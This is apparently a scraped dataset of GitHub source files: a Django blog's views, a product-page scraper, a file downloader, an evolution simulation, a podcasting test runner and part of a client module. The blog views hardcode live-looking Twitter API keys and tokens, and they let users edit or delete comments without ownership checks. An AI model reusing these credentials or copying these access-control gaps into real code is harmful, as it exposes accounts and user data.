self.get_context_data()\n return self.render_to_response(context)\n\n\ndef detail_view_show(request, pk, year, month, day, post, author):\n post = get_object_or_404(Post, id=pk)\n # post = Post.objects.get(id=pk)\n Tracker.objects.create_from_request(request, post)\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n email_id = post.author.email\n blob = TextBlob(post.content)\n key_words_list = tag_list(post.content)\n sentiment = blob.sentiment\n subjectivity = round(sentiment[0], 2)\n polarity = round(sentiment[1], 3)\n comments = post.comments.filter(active=True)\n tracker_count = ''\n if Tracker.objects.filter(object_id__exact=post.id).exists():\n tracker_count = Tracker.objects.filter(object_id__exact=post.id).count()\n\n comment_form = CommentsForm(request.POST, request.FILES)\n comment_reply_form = CommentReplyForm(request.POST)\n reply = []\n for comment in comments:\n reply_post = comment.comments_reply.all()\n reply.append(reply_post)\n if request.method == 'POST':\n if comment_form.is_valid():\n name = comment_form.cleaned_data['name']\n email_data = comment_form.cleaned_data['email']\n comm_url = request.build_absolute_uri(post.get_absolute_url())\n print(comm_url)\n new_comment = comment_form.save(commit=False)\n new_comment.post = post\n new_comment.user = request.user\n new_comment.save()\n create_action(request.user, 'Posted a new comment on', post)\n send_mail(f'New Comment for your Post {post.title} ',\n f'A comment has been posted by {name} on {post.title},'\n f' click on {comm_url}{post.slug}/ to view. Contact the person on email id {email_data}',\n \"from.wetoowrite@gmail.com\", [email_id])\n sent = True\n return render(request, 'blog/post_detail.html',\n {'object': post, 'post': post, 'summary_list': summary(post),\n 'comment_form': CommentsForm(\n initial={'name': request.user, 'email': request.user.email}),\n 'comments': post.comments.filter(active=True),\n 'comment_reply_form': CommentReplyForm(), 'key_words_list': key_words_list,\n 'comment_replies': reply, 'polarity': polarity, 'subjectivity': subjectivity,\n 'total_views': tracker_count, 'title': post.slug,\n })\n\n return render(request, 'blog/post_detail.html', {'object': post, 'post': post, 'summary_list': summary(post),\n 'comment_form': CommentsForm(\n initial={'name': request.user,\n 'email': 'from.wetoowrite@gmail.com'}),\n 'comments': comments, 'comment_reply_form': CommentReplyForm(),\n 'comment_replies': reply, 'polarity': polarity,\n 'subjectivity': subjectivity, 'title': post.slug,\n 'key_words_list': key_words_list, 'total_views': tracker_count,\n })\n\n\ndef detail_view(request, pk):\n post = get_object_or_404(Post, id=pk)\n # post = Post.objects.get(id=pk)\n Tracker.objects.create_from_request(request, post)\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n email_id = post.author.email\n blob = TextBlob(post.content)\n key_words_list = tag_list(post.content)\n sentiment = blob.sentiment\n subjectivity = round(sentiment[0], 2)\n polarity = round(sentiment[1], 3)\n comments = post.comments.filter(active=True)\n tracker_count = ''\n if Tracker.objects.filter(object_id__exact=post.id).exists():\n tracker_count = Tracker.objects.filter(object_id__exact=post.id).count()\n\n comment_form = CommentsForm(request.POST, request.FILES)\n comment_reply_form = CommentReplyForm(request.POST)\n reply = []\n for comment in comments:\n reply_post = comment.comments_reply.all()\n reply.append(reply_post)\n if request.method == 'POST':\n if comment_form.is_valid():\n name = comment_form.cleaned_data['name']\n email_data = comment_form.cleaned_data['email']\n comm_url = request.build_absolute_uri(post.get_absolute_url())\n new_comment = comment_form.save(commit=False)\n new_comment.post = post\n new_comment.save()\n create_action(request.user, 'Posted a new comment on', post)\n send_mail(f'New Comment for your Post {post.title} ',\n f'A comment has been posted by {name} on {post.title},'\n f' click on {comm_url}{post.slug}/ to view. Contact the person on email id {email_data}',\n \"from.wetoowrite@gmail.com\", [email_id])\n sent = True\n return render(request, 'blog/post_detail.html',\n {'object': post, 'post': post, 'summary_list': summary(post),\n 'comment_form': CommentsForm(\n initial={'name': request.user, 'email': request.user.email}),\n 'comments': post.comments.filter(active=True),\n 'comment_reply_form': CommentReplyForm(), 'key_words_list': key_words_list,\n 'comment_replies': reply, 'polarity': polarity, 'subjectivity': subjectivity,\n 'total_views': tracker_count, 'title': post.slug,\n })\n\n return render(request, 'blog/post_detail.html', {'object': post, 'post': post,\n 'summary_list': summary(post) if summary(\n post) is not False else False,\n 'comment_form': CommentsForm(\n initial={'name': request.user,\n 'email': 'from.wetoowrite@gmail.com'}),\n 'comments': comments, 'comment_reply_form': CommentReplyForm(),\n 'comment_replies': reply, 'polarity': polarity,\n 'subjectivity': subjectivity, 'title': post.slug,\n 'key_words_list': key_words_list, 'total_views': tracker_count,\n })\n\n\n@login_required\ndef comment_update(request, pk, idx):\n form = CommentsForm(request.POST)\n post = Post.objects.get(id=idx)\n if form.is_valid():\n body = form.cleaned_data['body']\n comment = Comments.objects.get(id=pk)\n comment.body = body\n comment.save()\n else:\n print('not valid')\n # redirect to a model obj instance\n return redirect(post)\n\n\n@login_required\ndef reply_delete(request, pk, idx):\n post = Post.objects.get(id=idx)\n reply = CommentReply.objects.get(id=pk)\n reply.delete()\n return redirect(post)\n\n\n@login_required\ndef comment_delete(request, pk, idx):\n post = Post.objects.get(id=idx)\n comment = Comments.objects.get(id=pk)\n comment.delete()\n return redirect(post)\n\n\nclass PostUpdateView(UpdateView, UserPassesTestMixin, LoginRequiredMixin):\n model = Post\n form_class = PostForm\n template_name_suffix = '_update_form'\n\n # to override author\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n # to authenticate user and author are same\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\ndef reply_ajax(request):\n comment_reply_form = CommentReplyForm(request.POST)\n if request.method == 'POST':\n if comment_reply_form.is_valid():\n id = request.POST.get('com_id')\n name = comment_reply_form.cleaned_data['name']\n reply = comment_reply_form.cleaned_data['reply']\n new_comment_reply = comment_reply_form.save(commit=False)\n new_comment_reply.comments = Comments.objects.get(id=id)\n new_comment_reply.user = request.user\n new_comment_reply.save()\n comment = Comments.objects.get(id=id)\n create_action(get_current_user(), 'replied to a comment on', comment.post)\n response = {'name': name, 'reply': reply}\n return JsonResponse(response)\n\n\n@login_required\n@require_POST\ndef post_like(request):\n # 'id','action' being passed as 'data-id/action in a tag\n post_id = request.POST.get('id')\n action = request.POST.get('action')\n if post_id and action:\n post = Post.objects.get(id=post_id)\n if action == 'like':\n post.users_like.add(request.user)\n create_action(request.user, \"Liked Post\", post)\n else:\n post.users_like.remove(request.user)\n create_action(request.user, \"Unliked Post\", post)\n return JsonResponse({'status': 'ok'})\n return JsonResponse({'status': 'not_ok'})\n\n\n@login_required\n@require_POST\ndef follow_users(request):\n # 'id','action' being passed as 'data-id/action in a tag\n follower_id = request.POST.get('id')\n action = request.POST.get('action')\n\n if follower_id and action:\n user = User.objects.get(id=follower_id)\n if action == 'follow':\n Contact.objects.get_or_create(\n user_from=request.user,\n user_to=user\n )\n create_action(request.user, \"Followed\", user)\n else:\n Contact.objects.filter(\n user_from=request.user,\n user_to=user\n ).delete()\n create_action(request.user, \"Unfollowed\", user)\n return JsonResponse({'status': 'ok'})\n return JsonResponse({'status': 'not_ok'})\n\n\ndef twitter_post(screen_names, count):\n API_key = 'H6ybab13ZU5cdaUnj6KtP5AMI'\n API_secret = 'VXwYC9cmCnOqVzEpvWonVMqbUBtDX8KiUm40lpIzrz2IadNeeN'\n access_token = '1667776874-rBHAOHpytghmzJUEB7rs6gRi2cqWt3oja9jDF0k'\n access_token_secret = 'TyAztICP2ZU6nEUxgLuGDDmQLVV495YSDW97sRpCnPaYX'\n auth = tw.OAuthHandler(API_key, API_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tw.API(auth, wait_on_rate_limit=True)\n all_tweets = []\n for name in screen_names:\n new_tweets = api.user_timeline(screen_name=name, count=count)\n all_tweets.extend(new_tweets)\n if not hasattr(all_tweets, 'retweeted_status'):\n return all_tweets\n\n\ndef check_text(tweets):\n tweet_clone = tweets.copy()\n tweets.clear()\n for tweet in tweet_clone:\n length = len(tweet.entities['user_mentions'])\n if length == 0 and not tweet.text.startswith('@'):\n tweets.append(tweet)\n return tweets\n\n\ndef twitter_posts(request):\n list_url = []\n list_name = []\n list_vol = []\n zip_data = zip()\n trends1 = []\n form = TrendsForm()\n screen_names = ['EconomicTimes', 'nytimes', 'htTweets', 'timesofindia', 'TOIIndiaNews', 'ETpanache', 'ETNOWlive',\n 'dna', 'soundarya_20', 'SrBachchan', 'AnupamPKher', 'radhika_apte', 'DishPatani', 'taapsee',\n 'narendramodi', 'ANI', 'firstpost', 'finshots']\n API_key = 'H6ybab13ZU5cdaUnj6KtP5AMI'\n API_secret = 'VXwYC9cmCnOqVzEpvWonVMqbUBtDX8KiUm40lpIzrz2IadNeeN'\n access_token = '1667776874-rBHAOHpytghmzJUEB7rs6gRi2cqWt3oja9jDF0k'\n access_token_secret = 'TyAztICP2ZU6nEUxgLuGDDmQLVV495YSDW97sRpCnPaYX'\n auth = tw.OAuthHandler(API_key, API_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tw.API(auth, wait_on_rate_limit=True)\n selected = get_trends()\n add_list = []\n for i in range(len(selected)):\n add_list.append(selected[i][1])\n if request.method == 'POST':\n form = TrendsForm(request.POST)\n if form.is_valid():\n input_data = form.cleaned_data\n country_index = ([x for x, y in enumerate(selected) if y[1] == input_data])\n try:\n woe_id = selected[country_index[0]][0]\n except Exception:\n messages.warning(request, f'Enter a proper Country! Showing Trends for India')\n woe_id = ''\n trends1 = api.trends_place(woe_id) if woe_id else api.trends_place(23424848)\n for trend in range(8):\n data = trends1[0]['trends'][trend]\n list_name.append(data['name'])\n list_url.append(data['url'])\n list_vol.append(data['tweet_volume'])\n zip_data = zip(list_name, list_url, list_vol)\n\n context = {\n 'function': twitter_post(screen_names, 50),\n 'name': zip_data,\n 'form': form,\n 'new_list': add_list,\n 'selected': input_data,\n\n }\n return render(request, 'blog/twitter.html', context)\n else:\n form = TrendsForm()\n zip_data = zip(list_name, list_url, list_vol)\n\n context = {\n 'function': check_text(twitter_post(screen_names, 50)),\n 'name': zip_data,\n 'form': form,\n 'new_list': add_list,\n }\n return render(request, 'blog/twitter.html', context)\n\n\ndef search_twitter(request):\n API_key = 'H6ybab13ZU5cdaUnj6KtP5AMI'\n API_secret = 'VXwYC9cmCnOqVzEpvWonVMqbUBtDX8KiUm40lpIzrz2IadNeeN'\n access_token = '1667776874-rBHAOHpytghmzJUEB7rs6gRi2cqWt3oja9jDF0k'\n access_token_secret = 'TyAztICP2ZU6nEUxgLuGDDmQLVV495YSDW97sRpCnPaYX'\n auth = tw.OAuthHandler(API_key, API_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tw.API(auth, wait_on_rate_limit=True)\n if request.method == 'POST':\n search_form = TwitterSearchForm(request.POST)\n if search_form.is_valid():\n search_word = search_form.cleaned_data\n search_results = api.search(q=search_word, count=100)\n search_tweeter = []\n c_polarity_sum = 0\n c_polarity_count = 0\n avg_c_polarity = 0\n for item in search_results:\n user = item._json['user']\n text = item._json['text']\n name = user['screen_name']\n location = user['location']\n image = user['profile_image_url_https']\n info = item._json['entities']\n s = TextBlob(item.text)\n polarity = round(s.sentiment[0], 2)\n objectivity = round(s.sentiment[1], 2)\n um = info['urls']\n url = ''\n if len(um) == 0:\n url = 'none'\n elif len(um) > 0:\n url = um[0]['expanded_url']\n re_tweets = None\n likes = None\n c_polarity = ''\n c_objectivity = ''\n if 'retweeted_status' in item._json.keys():\n re_tweets = item.retweeted_status.retweet_count\n likes = item.retweeted_status.favorite_count\n c_polarity = polarity * re_tweets\n c_objectivity = objectivity * re_tweets\n if re_tweets and polarity:\n c_polarity = re_tweets * polarity\n c_polarity_sum += c_polarity\n c_polarity_count += 1\n\n items = (image, name, text, location, url, objectivity, polarity, re_tweets, likes, c_polarity)\n search_tweeter.append(items)\n\n if c_polarity_count and c_polarity_sum:\n try:\n avg_c_polarity = c_polarity_sum / c_polarity_count\n print(avg_c_polarity)\n except:\n pass\n\n context = {\n 'search_form': search_form,\n 'search_results': list(set(search_tweeter)),\n 'avg_c_polarity': round(avg_c_polarity, 3),\n }\n return render(request, 'blog/search_twitter.html', context)\n\n else:\n search_form = TwitterSearchForm()\n context = {\n 'search_form': search_form,\n }\n return render(request, 'blog/search_twitter.html', context)\n\n\ndef handler404(request, exception=None):\n return render(request, 'blog/404.html', status=404)\n\n\ndef handler500(request, exception=None):\n return render(request, 'blog/500.html', status=500)\n\n\nclass LenSpeakListView(ListView):\n model = PhotoStory\n\n\n@login_required\ndef create_photo_story(request):\n context = {\n # 'photos': Photo.objects.filter(photo_story__user=request.user),\n 'form': PhotoForm(),\n 'story_form': PhotoStoryForm(),\n }\n if request.method == \"POST\":\n form = PhotoForm(request.POST, request.FILES)\n photo_story = PhotoStory()\n story_form = PhotoStoryForm(request.POST)\n if form.is_valid() and story_form.is_valid():\n # save story\n photo_story.story_title = story_form.cleaned_data.get('story_title', None)\n photo_story.story_content = story_form.cleaned_data.get('story_content', None)\n photo_story.user = request.user\n photo_story.save(PhotoStory)\n # save pics\n photo = Photo()\n photo.file = form.cleaned_data['file']\n photo.title_of_the_picture = form.cleaned_data['title_of_the_picture']\n photo.describe_the_picture = form.cleaned_data['describe_the_picture']\n photo.photo_story = PhotoStory.objects.latest('uploaded_at')\n print(photo.title_of_the_picture, 'photo')\n photo.save(Photo)\n create_action(request.user, 'Posted a new Photo Story on', photo_story)\n Tracker.objects.create_from_request(request, photo_story)\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n context = {\n 'story': PhotoStory.objects.latest('uploaded_at'),\n 'photos': Photo.objects.filter(photo_story=PhotoStory.objects.latest('uploaded_at').id)\n\n }\n return render(request, 'blog/photo_gallery.html', context)\n\n return render(request, 'blog/upload_images.html', context)\n\n\n@login_required\ndef make_photo_story(request):\n context = {\n 'form': PhotoForm(),\n 'story_form': PhotoStoryForm(),\n }\n if request.method == \"POST\":\n form = PhotoStoryForm(request.POST)\n photo_form = PhotoForm(request.POST, request.FILES)\n files = request.FILES.getlist('file')\n if form.is_valid() and photo_form.is_valid():\n new_story = form.save(commit=False)\n new_story.user = request.user\n new_story.save()\n photo_story = PhotoStory.objects.latest('uploaded_at')\n story_title = form.cleaned_data['story_title']\n for file in files:\n new_photo = photo_form.save(commit=False)\n new_photo.photo_story = photo_story\n new_photo.file = file\n new_photo.save()\n create_action(request.user, 'Posted a new Photo Story on', photo_story)\n Tracker.objects.create_from_request(request, photo_story)\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n new_picture_story = PhotoStory.objects.filter(story_title=story_title)\n new_picture_story = new_picture_story.first() if new_picture_story.count()>0 else None\n context = {\n 'story': photo_story,\n 'photos': Photo.objects.filter(photo_story=photo_story.id)\n\n }\n return redirect(new_picture_story)\n\n return render(request, 'blog/upload_images.html', context)\n\n\n@login_required\ndef add_photo_to_story(request, pk):\n story = get_object_or_404(PhotoStory, id=pk)\n context = {\n 'photos': Photo.objects.filter(photo_story_id=story.id),\n 'story': story,\n 'form': PhotoForm(),\n\n }\n if request.method == \"POST\":\n form = PhotoForm(request.POST, request.FILES)\n photo = Photo()\n if form.is_valid():\n for field in request.FILES.keys():\n for form_file in request.FILES.getlist(field):\n new_photo = Photo()\n new_photo.file = form_file\n new_photo.title_of_the_picture = form.cleaned_data['title_of_the_picture']\n new_photo.describe_the_picture = form.cleaned_data['describe_the_picture']\n new_photo.photo_story = story\n new_photo.save(Photo)\n return redirect(story)\n return render(request, 'blog/upload_images.html', context)\n\n\ndef large_file(request, pk):\n story = get_object_or_404(PhotoStory, id=pk)\n context = {\n 'photos': Photo.objects.filter(photo_story_id=story.id),\n 'story': story,\n 'form': PhotoForm(),\n 'story_id': pk,\n\n }\n if request.method == 'POST':\n new_photo = Photo()\n new_photo.file = request.POST['file']\n new_photo.title_of_the_picture = request.POST['title_of_the_picture']\n new_photo.describe_the_picture = request.POST['describe_the_picture']\n new_photo.photo_story = story\n new_photo.save(Photo)\n return redirect(story)\n\n return render(request, 'blog/large_upload.html', context)\n\n\ndef large_file_direct(request):\n S3_BUCKET = 'wetoowrite'\n file_name = request.GET['file_name']\n file_type = request.GET['file_type']\n # my_config = Config(\n # region_name='ap-south-1',\n # signature_version='s3v4',\n # )\n\n s3 = boto3.client('s3',\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID,\n aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,\n region_name=settings.AWS_S3_REGION_NAME\n )\n\n presigned_post = s3.generate_presigned_post(\n Bucket=S3_BUCKET,\n Key=f'{request.user}/{file_name}',\n Fields={\"acl\": \"public-read\",\n \"Content-Type\": file_type},\n Conditions=[\n {\"acl\": \"public-read\"},\n {\"Content-Type\": file_type},\n ],\n ExpiresIn=3600,\n )\n print(presigned_post)\n response = {\n 'data': presigned_post,\n 'url': 'https://%s.s3.amazonaws.com/%s' % (S3_BUCKET, file_name)\n }\n\n return JsonResponse(response, safe=False)\n\n\ndef update_db(request):\n data = request.POST\n print(data)\n pk = data.get('story_id')\n story = get_object_or_404(PhotoStory, id=int(pk))\n Photo.objects.create(photo_story=story, title_of_the_picture=data.get('title'),\n describe_the_picture=data.get('description'),\n file=data.get('uploadedFile'))\n\n return JsonResponse({'response': 'success'})\n\n\nclass PhotoUpdateView(UpdateView, UserPassesTestMixin, LoginRequiredMixin):\n model = Photo\n form_class = PhotoForm\n template_name_suffix = '_update_form'\n context_object_name = 'object'\n\n # to override author\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n # to authenticate user and author are same\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\nclass StoryUpdateView(UpdateView, UserPassesTestMixin, LoginRequiredMixin):\n model = PhotoStory\n form_class = PhotoStoryForm\n template_name_suffix = '_update_form'\n context_object_name = 'object'\n\n # to override author\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n # to authenticate user and author are same\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\ndef photo_story_view(request, pk, tale, author, year, month, day):\n story = PhotoStory.objects.get(id=pk)\n\n photos = Photo.objects.filter(photo_story_id=story.id)\n Tracker.objects.create_from_request(request, story)\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n pic_list = []\n video_list = []\n if photos.count() > 0:\n for photo in photos:\n file_name = photo.file\n if str(file_name).endswith('mp4') or str(file_name).endswith('webm'):\n video_list.append(photo)\n else:\n pic_list.append(photo)\n context = {\n 'photos': pic_list if len(pic_list) > 0 else None,\n 'videos': video_list if len(video_list) > 0 else None,\n 'story': story,\n }\n return render(request, 'blog/photo_gallery.html', context)\n\n\n@login_required\ndef clear_database(request, pk, story_pk):\n Photo.objects.get(id=pk).delete()\n return redirect('upload-images', story_pk)\n\n\n@login_required\ndef delete_story(request, pk):\n story = PhotoStory.objects.get(id=pk)\n Tracker.objects.create_from_request(request, story)\n try:\n tgt = ContentType.objects.get_for_model(PhotoStory)\n action = Action.objects.get(target_id=story.id, target_ct=tgt.id)\n action.delete()\n except:\n pass\n story.delete()\n messages.success(request, f'{story.story_title} deleted')\n return redirect('picture-story-list')\n","repo_name":"rajesitb/wetoowrite","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":35710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1631486247","text":"import requests\nimport random\nimport time\nfrom lxml import etree\n\n\nsession = requests.Session()\nheaders = {\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit 537.36 (KHTML, like Gecko) Chrome\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*;q=0.8\"}\n\ndef getPages(info):\n lists = [info]\n url, category = info.split(\",\", maxsplit = 1)[0], info.split(\",\", maxsplit = 1)[1]\n body = session.get(url, headers=headers).text\n pageNum = etree.HTML(body).xpath('//*[@id=\"searchResultListDiv\"]/div[4]/label/b')[0].text\n n = int(pageNum)\n if n > 1:\n for i in range(2, n+1):\n lists.append(url + \"page\" + str(i) + \"/,\" + category)\n time.sleep(random.randrange(2, 3))\n return lists\n\n\ndef genInputs(filenames):\n with open(filenames) as data:\n for i in data:\n i = i.strip()\n for j in getPages(i):\n with open(\"inputs\", \"a\") as output:\n print(j, file = output)\n print(j)\n\nif __name__ == \"__main__\":\n try:\n genInputs(\"pages\")\n except Exception as e:\n print(str(e))\n","repo_name":"JinkeCao/MMA-Category-Info","sub_path":"sephora/2_gen_pages.py","file_name":"2_gen_pages.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11930869477","text":"import os\r\nimport requests\r\n\r\n\r\ndef download_file(url, path):\r\n \"\"\"Baixa um arquivo da URL especificada e o salva no caminho especificado\"\"\"\r\n try:\r\n response = requests.get(url)\r\n response.raise_for_status()\r\n except requests.exceptions.RequestException as e:\r\n print(f\"Erro de rede: {e}\")\r\n return\r\n\r\n if os.path.exists(path):\r\n overwrite = input(f\"O arquivo {path} já existe. Deseja sobrescrevê-lo? (S/N): \")\r\n if overwrite.upper() != 'S':\r\n print(\"Operação cancelada\")\r\n return\r\n\r\n try:\r\n with open(path, 'wb') as f:\r\n f.write(response.content)\r\n print(f\"Arquivo salvo em {path}\")\r\n except IOError as e:\r\n print(f\"Erro ao salvar arquivo: {e}\")\r\n except Exception as e:\r\n print(f\"Erro desconhecido: {e}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n url = input(\"Digite a URL do arquivo a ser baixado: \")\r\n path = input(\"Digite o caminho do arquivo para salvar (incluindo o nome do arquivo): \")\r\n download_file(url, path)\r\n except Exception as e:\r\n print(f\"Erro desconhecido: {e}\")\r\n","repo_name":"alanhcc/ferramentas-pentester","sub_path":"ferramentas/baixaaquivo/baixar.py","file_name":"baixar.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73668575184","text":"import pygame\nimport random\nimport pickle\nfrom random import random, seed, randrange, choices\nfrom math import exp\nimport numpy as np\nfrom brain import Brain\nfrom organism import Organism\nfrom datetime import datetime\nfrom replaydata import ReplayData\n\n\"\"\"\n********************************************************************************************\ncreate a draw data file based upon the current replay data recived\ndelete env .py as an when we are done with the drawing function\nthere is no use of env file currently\nsame case with display replay\nnow all simation/pickle dumping/ replaying will be done in main file\n********************************************************************************************\n\"\"\"\n\n\nclass Evolution:\n def __init__(self, gridsize, no_of_steps, no_of_gens, no_of_inputs, no_of_hidden, no_of_outputs, mutation_factor):\n self.mutation_factor = [i for i in range(mutation_factor)]\n self.no_of_inputs = no_of_inputs\n self.no_of_hidden = no_of_hidden\n self.no_of_outputs = no_of_outputs\n self.circle_size = 4 # deprected\n self.organisms = []\n self.replaydump = None# deprecated\n self.gridsize = gridsize\n self.no_of_organisms = gridsize\n self.envgrid = [[False for i in range(gridsize)] for j in range(gridsize)]\n self.no_of_steps = no_of_steps\n self.no_of_gens = no_of_gens\n self.replay = [] # deprectaed\n self.input = [0, 0] # del this later just a temp fix need to take input dynamically from the env\n\n def object_to_color(self,object):\n h = hash(object)\n return (h%1000%255,h%1000000//1000%255,h%1000000000//1000000%255)\n\n def populate_env(self): \n i = 0\n while i < self.no_of_organisms:\n seed(datetime.now())\n x,y = randrange(0, self.gridsize-1), randrange(0, self.gridsize -1)\n if not self.envgrid[x][y]:\n seed(datetime.now())\n brain = Brain(self.no_of_inputs, self.no_of_hidden, self.no_of_outputs)\n self.envgrid[x][y] = True\n self.organisms.append(Organism(self.object_to_color(brain), (x,y), brain))\n i += 1\n print(\"Done populating environment : \")\n\n def survial_check(self):\n for organism in self.organisms:\n if organism.pos[0] > self.gridsize/4 and organism.pos[1] > self.gridsize/4:\n self.envgrid[organism.pos[0]][organism.pos[1]] = False\n self.organisms.remove(organism)\n print('Done survival check deleted unfit organisms :')\n\n def genome_combiner(self, parent_a, parent_b):\n #complex shot do not change\n new_brain = Brain(self.no_of_inputs, self.no_of_hidden, self.no_of_outputs)\n brain_a = parent_a.brain\n brain_b = parent_b.brain\n temp_var = [1, -1]\n for layer in range(len(brain_a.network)):\n for neuron in range(len(brain_a.network[layer])):\n for weight in range(len(brain_a.network[layer][neuron]['weights'])):\n seed(datetime.now())\n direction = choices(temp_var)\n mutation_weight = choices(self.mutation_factor)\n multiplicative_factor = 1 + (direction[0] * mutation_weight[0])/100\n new_brain.network[layer][neuron]['weights'][weight] = ((brain_a.network[layer][neuron]['weights'][weight] * multiplicative_factor) + (brain_b.network[layer][neuron]['weights'][weight] * multiplicative_factor))/2\n return new_brain\n \n def repopulate(self):\n new_generation = []\n self.envgrid = [[False for i in range(self.gridsize)] for j in range(self.gridsize)]\n while len(new_generation) < self.no_of_organisms:\n seed(datetime.now())\n x,y = randrange(0, self.gridsize-1), randrange(0, self.gridsize -1)\n if not self.envgrid[x][y]:\n parent_a, parent_b = choices(self.organisms, k = 2)\n new_organism_brain = self.genome_combiner(parent_a, parent_b)\n new_color = [(parent_a.color[i] + parent_b.color[i])/2 for i in range(len(parent_a.color))]\n new_organism = Organism(self.object_to_color(new_organism_brain), (x,y), new_organism_brain)\n new_generation.append(new_organism)\n self.envgrid[x][y] = True\n self.organisms = new_generation\n print('Done repopulating')\n\n def evolve(self):\n self.generations = []\n for gen in range(self.no_of_gens):#single gen\n # this loop perfroms set tranformations for given no of steps\n self.steps = []\n for step in range(self.no_of_steps): # single step \n # this for loop is perfroming transformation on over organisms\n temp_pos = []\n for organism in self.organisms:\n previous_pos = organism.pos\n brain_input = (organism.pos[0]- self.gridsize/2, organism.pos[1] - self.gridsize/2)\n brain_input = self.input\n direction = organism.brain.forward_propogate(brain_input)\n if organism.move(direction, self.envgrid):\n self.envgrid[previous_pos[0]][previous_pos[1]] = False\n self.envgrid[organism.pos[0]][organism.pos[1]] = True\n temp_pos.append(ReplayData(organism.pos, organism.color))\n self.steps.append(temp_pos)\n #print('In step : ',step, self.organisms[0].pos, self.steps[step][0].pos)\n self.generations.append(self.steps)\n print('Gen : ', gen)\n self.survial_check()\n print('No of survivors : ', len(self.organisms))\n self.repopulate()\n print('Done evolution : ')\n return self.generations\n \n\n\n\n","repo_name":"AyushBobale/Neuro-Evolution","sub_path":"evolution.py","file_name":"evolution.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8581988946","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nimport django\nfrom django.conf import settings\n\ntry:\n import licenses\nexcept ImportError:\n licenses = False\n\ntry:\n import photologue\nexcept ImportError:\n photologue = False\n\n\nDEFAULT_SETTINGS = dict(\n INSTALLED_APPS=(\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sites\",\n \"podcasting\",\n \"podcasting.tests\",\n ),\n MIDDLEWARE_CLASSES=[\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n ],\n DATABASES={\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \":memory:\",\n }\n },\n SITE_ID = 1,\n ROOT_URLCONF=\"podcasting.tests.urls\",\n SECRET_KEY=\"notasecret\",\n)\n\nif licenses:\n DEFAULT_SETTINGS[\"INSTALLED_APPS\"] += (\"licenses\",)\n\nif photologue:\n DEFAULT_SETTINGS[\"INSTALLED_APPS\"] += (\"photologue\",)\n\ndef runtests(*test_args):\n if not settings.configured:\n settings.configure(**DEFAULT_SETTINGS)\n\n # Compatibility with Django 1.7's stricter initialization\n if hasattr(django, \"setup\"):\n django.setup()\n\n parent = os.path.dirname(os.path.abspath(__file__))\n sys.path.insert(0, parent)\n\n try:\n from django.test.runner import DiscoverRunner\n runner_class = DiscoverRunner\n test_args = [\"podcasting.tests\"]\n except ImportError:\n from django.test.simple import DjangoTestSuiteRunner\n runner_class = DjangoTestSuiteRunner\n test_args = [\"tests\"]\n\n failures = runner_class(verbosity=1, interactive=True, failfast=False).run_tests(test_args)\n sys.exit(failures)\n\n\nif __name__ == \"__main__\":\n runtests(*sys.argv[1:])\n","repo_name":"rizumu/django-podcasting","sub_path":"runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"48"} +{"seq_id":"6662872925","text":"from thinkpol.utils import connection as cn\nfrom thinkpol.protobufs import cortex_pb2\nfrom thinkpol.protobufs import config_pb2\n\n\ndef get_user_msg(r):\n\t\"\"\"\n\tGets a formatted binary message containing user information\n\tfrom a reader object.\n\n\t:param r: the reader object\n\t:type r: Reader\n\t:returns: the formatted binary message\n\t:rtype: bytes\n\t\"\"\"\n\tuser = cortex_pb2.User(\n\t\tuser_id = r.user_id,\n\t\tusername = r.user_name,\n\t\tbirthday = r.birth_date,\n\t\tgender = r.gender\n\t\t)\n\tuser_msg = user.SerializeToString()\n\treturn user_msg\n\n\ndef send_snapshot(user_msg, snapshot, host, port):\n\t\"\"\"\n\tSends a single snapshot of a user's cognition \n\tto server in address host:port.\n\n\t:param user_msg: the serialized binary info of the user who's snapshot we're to send\n\t:type user_msg: bytes \n\t:param snapshot: the snapshot we're to send\n\t:type snapshot: Snapshot\n\t:param host: the host of the server\n\t:type host: str\n\t:param port: the port of the server\n\t:type port: str\n\t\"\"\"\n\twith cn.Connection.connect(host, int(port)) as connection:\n\t\tconnection.send_message(user_msg)\n\t\tconfig_msg = connection.receive_message()\n\t\tconfig = 